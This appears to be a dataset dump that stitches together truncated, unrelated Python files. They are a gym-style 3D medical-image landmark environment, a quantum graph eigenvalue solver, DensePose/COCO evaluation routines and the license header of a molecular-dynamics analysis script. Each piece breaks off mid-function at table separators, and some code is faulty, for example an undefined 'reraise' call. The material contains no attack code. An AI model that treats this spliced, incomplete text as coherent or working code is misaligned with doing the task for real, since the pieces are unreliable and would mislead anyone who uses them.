input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: medical.py
# Author: <NAME> <<EMAIL>>
import csv
import itertools
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
warnings.simplefilter("ignore", category=PendingDeprecationWarning)
import os
import sys
import six
import random
import threading
import numpy as np
from tensorpack import logger
from collections import Counter, defaultdict, deque, namedtuple
import cv2
import math
import time
from PIL import Image
import subprocess
import shutil
import gym
from gym import spaces
try:
import pyglet
except ImportError as e:
reraise(suffix="HINT: you can install pyglet directly via 'pip install pyglet'.")
from tensorpack.utils.utils import get_rng
from tensorpack.utils.stats import StatCounter
from IPython.core.debugger import set_trace
from dataReader import *
_ALE_LOCK = threading.Lock()
Rectangle = namedtuple("Rectangle", ["xmin", "xmax", "ymin", "ymax", "zmin", "zmax"])
# ===================================================================
# =================== 3d medical environment ========================
# ===================================================================
class MedicalPlayer(gym.Env):
"""Class that provides 3D medical image environment.
This is just an implementation of the classic "agent-environment loop".
Each time-step, the agent chooses an action, and the environment returns
an observation and a reward."""
def __init__(
self,
directory=None,
viz=False,
task=False,
files_list=None,
screen_dims=(27, 27, 27),
history_length=20,
multiscale=True,
max_num_frames=0,
saveGif=False,
saveVideo=False,
fiducial=0,
infDir="../inference",
):
"""
:param train_directory: environment or game name
:param viz: visualization
set to 0 to disable
set to +ve number to be the delay between frames to show
set to a string to be the directory for storing frames
:param screen_dims: shape of the frame cropped from the image to feed
it to dqn (d,w,h) - defaults (27,27,27)
:param nullop_start: start with random number of null ops
:param location_history_length: consider lost of lives as end of
episode (useful for training)
:max_num_frames: maximum numbe0r of frames per episode.
"""
# ######################################################################
## generate evaluation results from 19 different points
## save results in csv file
# self.csvfile = 'DuelDoubleDQN_multiscale_brain_mri_point_pc_ROI_45_45_45_midl2018.csv'
# if task != 'train':
# with open(self.csvfile, 'w') as outcsv:
# fields = ["filename", "dist_error"]
# writer = csv.writer(outcsv)
# writer.writerow(map(lambda x: x, fields))
#
# x = [0.5,0.25,0.75]
# y = [0.5,0.25,0.75]
# z = [0.5,0.25,0.75]
# self.start_points = []
# for combination in itertools.product(x, y, z):
# if 0.5 in combination: self.start_points.append(combination)
# self.start_points = itertools.cycle(self.start_points)
# self.count_points = 0
# self.total_loc = []
# ######################################################################
super(MedicalPlayer, self).__init__()
# inits stat counters
self.reset_stat()
# counter to limit number of steps per episodes
self.cnt = 0
# maximum number of frames (steps) per episodes
self.max_num_frames = max_num_frames
# stores information: terminal, score, distError
self.info = None
# option to save display as gif
self.saveGif = saveGif
self.saveVideo = saveVideo
# training flag
self.task = task
# image dimension (2D/3D)
self.screen_dims = screen_dims
self.dims = len(self.screen_dims)
# multi-scale agent
self.multiscale = multiscale
# init env dimensions
if self.dims == 2:
self.width, self.height = screen_dims
else:
self.width, self.height, self.depth = screen_dims
with _ALE_LOCK:
self.rng = get_rng(self)
# visualization setup
if isinstance(viz, six.string_types): # check if viz is a string
assert os.path.isdir(viz), viz
viz = 0
if isinstance(viz, int):
viz = float(viz)
self.viz = viz
if self.viz and isinstance(self.viz, float):
self.viewer = None
self.gif_buffer = []
# stat counter to store current score or accumlated reward
self.current_episode_score = StatCounter()
# get action space and minimal action set
self.action_space = spaces.Discrete(6) # change number actions here
self.actions = self.action_space.n
self.observation_space = spaces.Box(
low=0, high=255, shape=self.screen_dims, dtype=np.uint8
)
# history buffer for storing last locations to check oscilations
self._history_length = history_length
self._loc_history = [(0,) * self.dims] * self._history_length
self._qvalues_history = [(0,) * self.actions] * self._history_length
# initialize rectangle limits from input image coordinates
self.rectangle = Rectangle(0, 0, 0, 0, 0, 0)
# add your data loader here
if self.task == "play":
self.files = filesListBrainMRLandmark(
files_list, returnLandmarks=False, fiducial=fiducial, infDir=infDir,
eval=True,
)
else:
if self.task == "eval":
self.files = filesListBrainMRLandmark(
files_list,
returnLandmarks=True,
fiducial=fiducial,
eval=True,
infDir=infDir,
)
else:
self.files = filesListBrainMRLandmark(
files_list,
returnLandmarks=True,
fiducial=fiducial,
eval=False,
infDir=infDir,
)
# prepare file sampler
self.filepath = None
self.sampled_files = self.files.sample_circular()
# reset buffer, terminal, counters, and init new_random_game
self._restart_episode()
def reset(self):
# with _ALE_LOCK:
self._restart_episode()
return self._current_state()
def _restart_episode(self):
"""
restart current episoide
"""
self.terminal = False
self.reward = 0
self.cnt = 0 # counter to limit number of steps per episodes
self.num_games.feed(1)
self.current_episode_score.reset() # reset the stat counter
self._loc_history = [(0,) * self.dims] * self._history_length
# list of q-value lists
self._qvalues_history = [(0,) * self.actions] * self._history_length
self.new_random_game()
def new_random_game(self):
"""
load image,
set dimensions,
randomize start point,
init _screen, qvals,
calc distance to goal
"""
self.terminal = False
self.viewer = None
# ####################################################################
# generate evaluation results from 19 different points
# if self.count_points ==0:
# print('\n============== new game ===============\n')
# # save results
# if self.total_loc:
# with open(self.csvfile, 'a') as outcsv:
# fields= [self.filename, self.cur_dist]
# writer = csv.writer(outcsv)
# writer.writerow(map(lambda x: x, fields))
# self.total_loc = []
# # sample a new image
# self._image, self._target_loc, self.filepath, self.spacing = next(self.sampled_files)
# scale = next(self.start_points)
# self.count_points +=1
# else:
# self.count_points += 1
# logger.info('count_points {}'.format(self.count_points))
# scale = next(self.start_points)
#
# x = int(scale[0] * self._image.dims[0])
# y = int(scale[1] * self._image.dims[1])
# z = int(scale[2] * self._image.dims[2])
# logger.info('starting point {}-{}-{}'.format(x,y,z))
######################################################################
# # sample a new image
self._image, self._target_loc, self.filepath, self.spacing = next(
self.sampled_files
)
self.filename = str(self.filepath)
# multiscale (e.g. start with 3 -> 2 -> 1)
# scale can be thought of as sampling stride
if self.multiscale:
## brain
self.action_step = 9
self.xscale = 3
self.yscale = 3
self.zscale = 3
## cardiac
# self.action_step = 6
# self.xscale = 2
# self.yscale = 2
# self.zscale = 2
else:
self.action_step = 1
self.xscale = 1
self.yscale = 1
self.zscale = 1
# image volume size
self._image_dims = self._image.dims
#######################################################################
## select random starting point
# add padding to avoid start right on the border of the image
if self.task == "train":
skip_thickness = (
(int)(self._image_dims[0] / 5),
(int)(self._image_dims[1] / 5),
(int)(self._image_dims[2] / 5),
)
else:
skip_thickness = (
int(self._image_dims[0] / 4),
int(self._image_dims[1] / 4),
int(self._image_dims[2] / 4),
)
x = self.rng.randint(
0 + skip_thickness[0], self._image_dims[0] - skip_thickness[0]
)
y = self.rng.randint(
0 + skip_thickness[1], self._image_dims[1] - skip_thickness[1]
)
z = self.rng.randint(
0 + skip_thickness[2], self._image_dims[2] - skip_thickness[2]
)
#######################################################################
self._location = (x, y, z)
self._start_location = (x, y, z)
self._qvalues = [0] * self.actions
self._screen = self._current_state()
if self.task == "play":
self.cur_dist = 0
else:
self.cur_dist = self.calcDistance(
self._location, self._target_loc, self.spacing
)
def calcDistance(self, points1, points2, spacing=(1, 1, 1)):
""" calculate the distance between two points in mm"""
spacing = np.array(spacing)
points1 = spacing * np.array(points1)
points2 = spacing * np.array(points2)
return np.linalg.norm(points1 - points2)
def step(self, act, qvalues):
"""The environment's step function returns exactly what we need.
Args:
act:
Returns:
observation (object):
an environment-specific object representing your observation of
the environment. For example, pixel data from a camera, joint angles
and joint velocities of a robot, or the board state in a board game.
reward (float):
amount of reward achieved by the previous action. The scale varies
between environments, but the goal is always to increase your total
reward.
done (boolean):
whether it's time to reset the environment again. Most (but not all)
tasks are divided up into well-defined episodes, and done being True
indicates the episode has terminated. (For example, perhaps the pole
tipped too far, or you lost your last life.)
info (dict):
diagnostic information useful for debugging. It can sometimes be
useful for learning (for example, it might contain the raw
probabilities behind the environment's last state change). However,
official evaluations of your agent are not allowed to use this for
learning.
"""
self._qvalues = qvalues
current_loc = self._location
self.terminal = False
go_out = False
# UP Z+ -----------------------------------------------------------
if act == 0:
next_location = (
current_loc[0],
current_loc[1],
round(current_loc[2] + self.action_step),
)
if next_location[2] >= self._image_dims[2]:
# print(' trying to go out the image Z+ ',)
next_location = current_loc
go_out = True
# FORWARD Y+ ---------------------------------------------------------
if act == 1:
next_location = (
current_loc[0],
round(current_loc[1] + self.action_step),
current_loc[2],
)
if next_location[1] >= self._image_dims[1]:
# print(' trying to go out the image Y+ ',)
next_location = current_loc
go_out = True
# RIGHT X+ | |
<reponame>hadassa2807/QuantumGraphs
"""
This file presents the quantum graph class.
"""
# Needed libraries:
import inspect
import os
import sys
import importlib
import numpy as np
import math
import cmath
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
from mpl_toolkits.mplot3d import Axes3D
from random import randint
"""
This class represents the Infinite loop exception (we raise if the eigenvalues finder function enters an infinite loop)
"""
class InfiniteLoop(Exception):
pass
"""
The quantum graph class
"""
class QuantumGraph:
"""
The constructor aims to initialize every characteristics of the quantum graph: the number of nodes, the adjacency matrix,
the number of edges from each vertex array, the matrix of the graph's characteristics, the S matrix, the minimal length from the
array of length, and the eigenvalues of the graph. We can also initialize a specific number of eigenvalues we want to compute and
an array of vertices with Dirichlet conditions.
"""
def __init__(self,Nb_nodes,A,coord_list,Num_eigenval=None, DVertices=None,min = None,max = None):
self.NbNodes = Nb_nodes
self.adj_mat = A
self.vertices = coord_list
self.num_eigval = Num_eigenval
if (DVertices==None):
self.DCondition = np.zeros(Nb_nodes, dtype=int)
else:
self.DCondition=DVertices
self.Nb_edges = self.NbOutingEdges()
self.TotEdges = self.Nb_edges[Nb_nodes]
self.transfer_mat = self.TM_simple()
self.graph_characteristics = self.def_of_edges()
self.SMatrix = self.S_mat(self.DCondition)
self.minL = self.min_L()
if min == None: self.startP = 0
else: self.startP = min
if max == None: self.endP = np.pi/self.minL
else: self.endP = max
if (Num_eigenval!=None):
self.EigenVal = self.k_eigenval_finder(Num_eigenval)
else:
self.EigenVal = self.Eigenvals_finder()
# Aims to convert a 2D array into a matrix
def load(self,table):
if len(table) != self.NbNodes or len(table[0]) != self.NbNodes:
return ("error : Bad dimensions")
for i in range(self.NbNodes):
for j in range(self.NbNodes):
self.adj_mat[i][j]=table[i][j]
# Gets an item from the matrix
def __getitem__(self,index):
return self.adj_mat[index]
# Sets a new value at place index into the matrix
def __setitem__(self,index,value):
self.adj_mat[index]=value
# Represents the matrix in rows and columns
def __repr__(self):
repres=""
for i in range(self.NbNodes):
repres=repres+str(self.adj_mat[i])
if i != self.NbNodes-1:
repres=repres+"\n"
return repres
"""
The following method aims to create an array which contains, at each position <vertex>,
the number of edges which are going out from the vertex.
"""
def NbOutingEdges(self):
x = 0
y = 0
a = []
# We count the number of edges (i,j) going out from each vertex (if the value of the adjacency matrix is positive at (i,j))
for i in range(0,self.NbNodes):
for j in range(0,self.NbNodes):
if self.adj_mat[i][j] > 0:
x = x+1
y = y + x
a.append(x)
x = 0
# We add the total number of edges in the graph at the end of the array.
a.append(y/2)
return a
"""
The transfer matrix;
The member(i,j) represents the numero of the edge between the node i and the node j;
If i and j are not connected, the value of the matrix at (i,j) is zero;
The diagonal of the matrix is filled with zeros.
The edges are entered in a "lexicographic" order according to the vertices' array given
"""
def TM_simple(self):
counter = 1
TM = np.zeros( (self.NbNodes, self.NbNodes) )
for i in range(0, self.NbNodes):
for j in range(i, self.NbNodes):
if (self.adj_mat[i][j] > 0):
TM[i][j] = int(counter)
TM[j][i] = TM[i][j]
counter+=1
else:
TM[i][j] = 0
TM[j][i] = TM[i][j]
return TM
"""
The calculation of edges' lengths with given coordinates
"""
def lengths_calc(self, x0, y0, x1, y1):
return np.sqrt(((y1-y0)**2)+((x1-x0)**2))
"""
The following method aims to create the matrix of characteristics of the edges of the graph, while:
The first row of the matrix represents the starting vertex of the edge numero column+1;
The second row of the matrix represents the ending vertex of the edge numero column+1;
The third row of the matrix represents the length of the edge numero column+1;
For each i even, the i-th column represents the charactersitic of an edge and the column i+1 the invert of this edge
"""
def def_of_edges(self):
Nb_tot = int(self.TotEdges)
GraphDetails = np.zeros( (3, 2*Nb_tot) )
for i in range(0,self.NbNodes):
for j in range(i,self.NbNodes):
if self.transfer_mat[i][j] > 0:
ind = int(2*(self.transfer_mat[i][j]-1))
# starting vertex of the edge numero column+1
GraphDetails[0][ind] = i
GraphDetails[0][ind+1] = j
# ending vertex of the edge numero column+1
GraphDetails[1][ind] = j
GraphDetails[1][ind+1] = i
# length of the edge numero column+1
x0 = self.vertices[int(GraphDetails[0][ind])][0]
y0 = self.vertices[int(GraphDetails[0][ind])][1]
x1 = self.vertices[int(GraphDetails[1][ind])][0]
y1 = self.vertices[int(GraphDetails[1][ind])][1]
GraphDetails[2][ind] = self.lengths_calc(x0, y0, x1, y1)
GraphDetails[2][ind+1] = GraphDetails[2][ind]
return GraphDetails
"""
This method returns the minimal length of all the edges of the graph.
"""
def min_L(self):
minLengths = self.graph_characteristics[2][0]
for num in range(1,int(self.Nb_edges[self.NbNodes]-1)):
if self.graph_characteristics[2][num]<minLengths:
minLengths = self.graph_characteristics[2][num]
return minLengths
"""
The S matrix of the quantum graph;
"""
def S_mat(self, dv):
Nb_tot = int(self.Nb_edges[self.NbNodes])
# Initialize the matrix to be of dimension which is number of (directed) edges
S = np.zeros( (2*Nb_tot, 2*Nb_tot) )
for i in range(0,2*Nb_tot):
for j in range(0,2*Nb_tot):
# If both edges i and j are the inverse of each other then we set the value of the S matrix at (i,j) to 2/dv-1
if ((self.graph_characteristics[1][i] == self.graph_characteristics[0][j]) and (self.graph_characteristics[0][i] == self.graph_characteristics[1][j])):
# Dirichlet condition -> we set the value of the S matrix at (i,j) to -1
if (dv[int(self.graph_characteristics[0][j])]==1):
S[i][j]=-1
else:
S[i][j]=(2/self.Nb_edges[int(self.graph_characteristics[1][i])])-1
# Otherwise, if the edges are adjacent, then we set the value of the S matrix at (i,j) to 2/dv
elif self.graph_characteristics[1][i] == self.graph_characteristics[0][j]:
if (dv[int(self.graph_characteristics[0][j])]==0):
S[i][j]=2/self.Nb_edges[int(self.graph_characteristics[1][i])]
# Dirichlet condition -> we set the value of the S matrix at (i,j) to 0
else:
S[i][j]=0
return S
"""
In the following method secular_det we are going to calculate the secular determinant.
We start by finding the complex one complex_det, and as seen in the formula (63),
we find the real function R_sec_det which has the same zeros k as complex_det,
as they are the sacred eigenvalues we are looking for.
"""
def secular_det(self, k):
Nb_tot = int(self.Nb_edges[self.NbNodes])
# Creation of the matrix D(k)
D = np.zeros( (2*Nb_tot, 2*Nb_tot), dtype=complex )
for row in range(0, 2*Nb_tot):
for col in range(0, 2*Nb_tot):
if (row == col):
D[row][col] = cmath.exp(1j*self.graph_characteristics[2][row]*k)
# Calculation of the secular determinant of I - S*D(k)
I = np.identity(2*Nb_tot)
A = I - np.matmul(self.SMatrix,D)
complex_det = np.linalg.det(A)
# Calculation of the real part of the secular determinant
S_det = np.linalg.det(self.SMatrix)
if (S_det < 0):
S_det_sqrt = math.sqrt(abs(S_det))*1j
else:
S_det_sqrt = math.sqrt(abs(S_det))
Sum_L = 0
for num in range(0, 2*Nb_tot, 2):
Sum_L += self.graph_characteristics[2][num]
R_sec_det = (cmath.exp(-1j*Sum_L*k)/S_det_sqrt)*complex_det
return R_sec_det
"""
The following method gets an interval (a,b) at which we want to search, and a number of iterations (N) to control
the ratio precision (running time of the research) and returns the value between the numbers a and b where the secular_det method
crosses a zero (if there is such a value)
"""
def bisection(self,a,b,N):
# Failure control of the algorithm.
if self.secular_det(a)*self.secular_det(b) >= 0:
print("Bisection method fails.")
print("reason of failure : ", self.secular_det(a), self.secular_det(b))
return None
# We set the starting point (a_n) and end point (b_n) of the interval
a_n = a
b_n = b
# Now we go over many samples of the function to look for zeros
for n in range(1,N+1):
# We set a middle point m_n (to be updated at each step of the loop)
m_n = (a_n + b_n)/2
f_m_n = self.secular_det(m_n)
# We check if m_n is correspunding to a zero (with a precision of 10^-6) and return it in that case.
if abs(f_m_n) <= 10**-6 :
return m_n
# We check if m_n is at the right side of the wanted zero;
# if so, the interval we look into is now (m_n, b_n).
elif self.secular_det(b_n)*f_m_n < 0:
a_n = m_n
b_n = b_n
# We check if m_n is at the left side of the wanted zero;
# if so, the interval we look into is now (a_n, m_n).
elif self.secular_det(a_n)*f_m_n < 0:
a_n = a_n
b_n = m_n
# Should not reach that point (failure of the method).
else:
"""print("Bisection method fails.")"""
return None
# In case of failure after | |
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
"""Functions for evaluating results computed for a json dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import logging
import numpy as np
import os
import uuid
import pickle
#from pycocotools.cocoeval import COCOeval
from detectron.datasets.densepose_cocoeval import denseposeCOCOeval
from detectron.core.config import cfg
from detectron.utils.io import save_object
import detectron.utils.boxes as box_utils
logger = logging.getLogger(__name__)
def evaluate_masks(
json_dataset,
all_boxes,
all_segms,
output_dir,
use_salt=True,
cleanup=False
):
res_file = os.path.join(
output_dir, 'segmentations_' + json_dataset.name + '_results'
)
if use_salt:
res_file += '_{}'.format(str(uuid.uuid4()))
res_file += '.json'
_write_coco_segms_results_file(
json_dataset, all_boxes, all_segms, res_file)
# Only do evaluation on non-test sets (annotations are undisclosed on test)
if json_dataset.name.find('test') == -1:
coco_eval = _do_segmentation_eval(json_dataset, res_file, output_dir)
else:
coco_eval = None
# Optionally cleanup results json file
if cleanup:
os.remove(res_file)
return coco_eval
def _write_coco_segms_results_file(
json_dataset, all_boxes, all_segms, res_file
):
# [{"image_id": 42,
# "category_id": 18,
# "segmentation": [...],
# "score": 0.236}, ...]
results = []
for cls_ind, cls in enumerate(json_dataset.classes):
if cls == '__background__':
continue
if cls_ind >= len(all_boxes):
break
cat_id = json_dataset.category_to_id_map[cls]
results.extend(_coco_segms_results_one_category(
json_dataset, all_boxes[cls_ind], all_segms[cls_ind], cat_id))
logger.info(
'Writing segmentation results json to: {}'.format(
os.path.abspath(res_file)))
with open(res_file, 'w') as fid:
json.dump(results, fid)
def _coco_segms_results_one_category(json_dataset, boxes, segms, cat_id):
results = []
image_ids = json_dataset.COCO.getImgIds()
image_ids.sort()
assert len(boxes) == len(image_ids)
assert len(segms) == len(image_ids)
for i, image_id in enumerate(image_ids):
dets = boxes[i]
rles = segms[i]
if isinstance(dets, list) and len(dets) == 0:
continue
dets = dets.astype(np.float)
scores = dets[:, -1]
results.extend(
[{'image_id': image_id,
'category_id': cat_id,
'segmentation': rles[k],
'score': scores[k]}
for k in range(dets.shape[0])])
return results
def _do_segmentation_eval(json_dataset, res_file, output_dir):
coco_dt = json_dataset.COCO.loadRes(str(res_file))
coco_eval = denseposeCOCOeval(json_dataset.COCO, coco_dt, 'segm')
coco_eval.evaluate()
coco_eval.accumulate()
_log_detection_eval_metrics(json_dataset, coco_eval)
eval_file = os.path.join(output_dir, 'segmentation_results.pkl')
save_object(coco_eval, eval_file)
logger.info('Wrote json eval results to: {}'.format(eval_file))
return coco_eval
def evaluate_boxes(
json_dataset, all_boxes, output_dir, use_salt=True, cleanup=False
):
res_file = os.path.join(
output_dir, 'bbox_' + json_dataset.name + '_results'
)
if use_salt:
res_file += '_{}'.format(str(uuid.uuid4()))
res_file += '.json'
_write_coco_bbox_results_file(json_dataset, all_boxes, res_file)
# Only do evaluation on non-test sets (annotations are undisclosed on test)
if json_dataset.name.find('test') == -1:
coco_eval = _do_detection_eval(json_dataset, res_file, output_dir)
else:
coco_eval = None
# Optionally cleanup results json file
if cleanup:
os.remove(res_file)
return coco_eval
def _write_coco_bbox_results_file(json_dataset, all_boxes, res_file):
# [{"image_id": 42,
# "category_id": 18,
# "bbox": [258.15,41.29,348.26,243.78],
# "score": 0.236}, ...]
results = []
for cls_ind, cls in enumerate(json_dataset.classes):
if cls == '__background__':
continue
if cls_ind >= len(all_boxes):
break
cat_id = json_dataset.category_to_id_map[cls]
results.extend(_coco_bbox_results_one_category(
json_dataset, all_boxes[cls_ind], cat_id))
logger.info(
'Writing bbox results json to: {}'.format(os.path.abspath(res_file)))
with open(res_file, 'w') as fid:
json.dump(results, fid)
def _coco_bbox_results_one_category(json_dataset, boxes, cat_id):
results = []
image_ids = json_dataset.COCO.getImgIds()
image_ids.sort()
assert len(boxes) == len(image_ids)
for i, image_id in enumerate(image_ids):
dets = boxes[i]
if isinstance(dets, list) and len(dets) == 0:
continue
dets = dets.astype(np.float)
scores = dets[:, -1]
xywh_dets = box_utils.xyxy_to_xywh(dets[:, 0:4])
xs = xywh_dets[:, 0]
ys = xywh_dets[:, 1]
ws = xywh_dets[:, 2]
hs = xywh_dets[:, 3]
results.extend(
[{'image_id': image_id,
'category_id': cat_id,
'bbox': [xs[k], ys[k], ws[k], hs[k]],
'score': scores[k]} for k in range(dets.shape[0])])
return results
def _do_detection_eval(json_dataset, res_file, output_dir):
coco_dt = json_dataset.COCO.loadRes(str(res_file))
coco_eval = denseposeCOCOeval(json_dataset.COCO, coco_dt, 'bbox')
coco_eval.evaluate()
coco_eval.accumulate()
_log_detection_eval_metrics(json_dataset, coco_eval)
eval_file = os.path.join(output_dir, 'detection_results.pkl')
save_object(coco_eval, eval_file)
logger.info('Wrote json eval results to: {}'.format(eval_file))
return coco_eval
def _log_detection_eval_metrics(json_dataset, coco_eval):
def _get_thr_ind(coco_eval, thr):
ind = np.where((coco_eval.params.iouThrs > thr - 1e-5) &
(coco_eval.params.iouThrs < thr + 1e-5))[0][0]
iou_thr = coco_eval.params.iouThrs[ind]
assert np.isclose(iou_thr, thr)
return ind
IoU_lo_thresh = 0.5
IoU_hi_thresh = 0.95
ind_lo = _get_thr_ind(coco_eval, IoU_lo_thresh)
ind_hi = _get_thr_ind(coco_eval, IoU_hi_thresh)
# precision has dims (iou, recall, cls, area range, max dets)
# area range index 0: all area ranges
# max dets index 2: 100 per image
precision = coco_eval.eval['precision'][ind_lo:(ind_hi + 1), :, :, 0, 2]
ap_default = np.mean(precision[precision > -1])
logger.info(
'~~~~ Mean and per-category AP @ IoU=[{:.2f},{:.2f}] ~~~~'.format(
IoU_lo_thresh, IoU_hi_thresh))
logger.info('{:.1f}'.format(100 * ap_default))
for cls_ind, cls in enumerate(json_dataset.classes):
if cls == '__background__':
continue
# minus 1 because of __background__
precision = coco_eval.eval['precision'][
ind_lo:(ind_hi + 1), :, cls_ind - 1, 0, 2]
ap = np.mean(precision[precision > -1])
logger.info('{:.1f}'.format(100 * ap))
logger.info('~~~~ Summary metrics ~~~~')
coco_eval.summarize()
def evaluate_box_proposals(
json_dataset, roidb, thresholds=None, area='all', limit=None
):
"""Evaluate detection proposal recall metrics. This function is a much
faster alternative to the official COCO API recall evaluation code. However,
it produces slightly different results.
"""
# Record max overlap value for each gt box
# Return vector of overlap values
areas = {
'all': 0,
'small': 1,
'medium': 2,
'large': 3,
'96-128': 4,
'128-256': 5,
'256-512': 6,
'512-inf': 7}
area_ranges = [
[0**2, 1e5**2], # all
[0**2, 32**2], # small
[32**2, 96**2], # medium
[96**2, 1e5**2], # large
[96**2, 128**2], # 96-128
[128**2, 256**2], # 128-256
[256**2, 512**2], # 256-512
[512**2, 1e5**2]] # 512-inf
assert area in areas, 'Unknown area range: {}'.format(area)
area_range = area_ranges[areas[area]]
gt_overlaps = np.zeros(0)
num_pos = 0
for entry in roidb:
gt_inds = np.where(
(entry['gt_classes'] > 0) & (entry['is_crowd'] == 0))[0]
gt_boxes = entry['boxes'][gt_inds, :]
gt_areas = entry['seg_areas'][gt_inds]
valid_gt_inds = np.where(
(gt_areas >= area_range[0]) & (gt_areas <= area_range[1]))[0]
gt_boxes = gt_boxes[valid_gt_inds, :]
num_pos += len(valid_gt_inds)
non_gt_inds = np.where(entry['gt_classes'] == 0)[0]
boxes = entry['boxes'][non_gt_inds, :]
if boxes.shape[0] == 0:
continue
if limit is not None and boxes.shape[0] > limit:
boxes = boxes[:limit, :]
overlaps = box_utils.bbox_overlaps(
boxes.astype(dtype=np.float32, copy=False),
gt_boxes.astype(dtype=np.float32, copy=False))
_gt_overlaps = np.zeros((gt_boxes.shape[0]))
for j in range(min(boxes.shape[0], gt_boxes.shape[0])):
# find which proposal box maximally covers each gt box
argmax_overlaps = overlaps.argmax(axis=0)
# and get the iou amount of coverage for each gt box
max_overlaps = overlaps.max(axis=0)
# find which gt box is 'best' covered (i.e. 'best' = most iou)
gt_ind = max_overlaps.argmax()
gt_ovr = max_overlaps.max()
assert gt_ovr >= 0
# find the proposal box that covers the best covered gt box
box_ind = argmax_overlaps[gt_ind]
# record the iou coverage of this gt box
_gt_overlaps[j] = overlaps[box_ind, gt_ind]
assert _gt_overlaps[j] == gt_ovr
# mark the proposal box and the gt box as used
overlaps[box_ind, :] = -1
overlaps[:, gt_ind] = -1
# append recorded iou coverage level
gt_overlaps = np.hstack((gt_overlaps, _gt_overlaps))
gt_overlaps = np.sort(gt_overlaps)
if thresholds is None:
step = 0.05
thresholds = np.arange(0.5, 0.95 + 1e-5, step)
recalls = np.zeros_like(thresholds)
# compute recall for each iou threshold
for i, t in enumerate(thresholds):
recalls[i] = (gt_overlaps >= t).sum() / float(num_pos)
# ar = 2 * np.trapz(recalls, thresholds)
ar = recalls.mean()
return {'ar': ar, 'recalls': recalls, 'thresholds': thresholds,
'gt_overlaps': gt_overlaps, 'num_pos': num_pos}
def evaluate_keypoints(
json_dataset,
all_boxes,
all_keypoints,
output_dir,
use_salt=True,
cleanup=False
):
res_file = os.path.join(
output_dir, 'keypoints_' + json_dataset.name + '_results'
)
if use_salt:
res_file += '_{}'.format(str(uuid.uuid4()))
res_file += '.json'
_write_coco_keypoint_results_file(
json_dataset, all_boxes, all_keypoints, res_file)
# Only do evaluation on non-test sets (annotations are undisclosed on test)
if json_dataset.name.find('test') == -1:
coco_eval = _do_keypoint_eval(json_dataset, res_file, output_dir)
else:
coco_eval = None
# Optionally cleanup results json file
if cleanup:
os.remove(res_file)
return coco_eval
def _write_coco_keypoint_results_file(
json_dataset, all_boxes, all_keypoints, res_file
):
results = []
for cls_ind, cls in enumerate(json_dataset.classes):
if cls == '__background__':
continue
if cls_ind >= len(all_keypoints):
break
logger.info(
'Collecting {} results ({:d}/{:d})'.format(
cls, cls_ind, len(all_keypoints) - 1))
cat_id = json_dataset.category_to_id_map[cls]
results.extend(_coco_kp_results_one_category(
json_dataset, all_boxes[cls_ind], all_keypoints[cls_ind], cat_id))
logger.info(
'Writing keypoint results json to: {}'.format(
os.path.abspath(res_file)))
with open(res_file, 'w') as fid:
json.dump(results, fid)
def _coco_kp_results_one_category(json_dataset, boxes, kps, cat_id):
results = []
image_ids = json_dataset.COCO.getImgIds()
image_ids.sort()
assert len(kps) == len(image_ids)
assert len(boxes) == len(image_ids)
use_box_score = False
if cfg.KRCNN.KEYPOINT_CONFIDENCE == 'logit':
# This is ugly; see utils.keypoints.heatmap_to_keypoints for the magic
# indexes
score_index = 2
elif cfg.KRCNN.KEYPOINT_CONFIDENCE == 'prob':
score_index = 3
elif cfg.KRCNN.KEYPOINT_CONFIDENCE == 'bbox':
use_box_score = True
else:
raise ValueError(
'KRCNN.KEYPOINT_CONFIDENCE must be "logit", "prob", or "bbox"')
for i, image_id in enumerate(image_ids):
if len(boxes[i]) == 0:
continue
kps_dets = kps[i]
scores = boxes[i][:, -1].astype(np.float)
if len(kps_dets) == 0:
continue
for j in range(len(kps_dets)):
xy = []
kps_score = 0
for k in range(kps_dets[j].shape[1]):
xy.append(float(kps_dets[j][0, k]))
xy.append(float(kps_dets[j][1, k]))
xy.append(1)
if not use_box_score:
kps_score += kps_dets[j][score_index, k]
if use_box_score:
kps_score = scores[j]
else:
kps_score /= kps_dets[j].shape[1]
results.extend([{'image_id': image_id,
'category_id': cat_id,
'keypoints': xy,
'score': kps_score}])
return results
def _do_keypoint_eval(json_dataset, res_file, output_dir):
ann_type = 'keypoints'
imgIds | |
<filename>cadee/qscripts/q_analysemaps.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2016 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
#
# This script can act as a standalone program with no arguments,
# or it can be imported to use the QAnalyseMaps object
# (first argument is a list of directories which contain the qfep output fil; optional argument is the name of the output file)
# and its functions like get_dGa_mean(), get_dG0_mean(), get_summary(), get_failed(), get_analysed() and so on...
#
# .get_analysed() returns a list of QAnalyseMap objects, which have functions to retrieve useful info like:
#
## - Reaction free energy profile normalized vs the reactants state - dG vs (E2-E1) ( get_dG_dE() )
## - Activation and reaction free energies ( get_dGa(), get_dG0() )
## - Free Energy Perturbation results - dG vs lambda ( get_dG_lambda() )
## - Average energies (Qbond,Qangle...) in each step vs frame ( get_E_lambda() )
## - dE(state1), dE(state2), LRA and REORG energies (Qbond,Qangle,...) ( get_dE1(), get_dE2(), get_lra(), get_reorg() )
import os
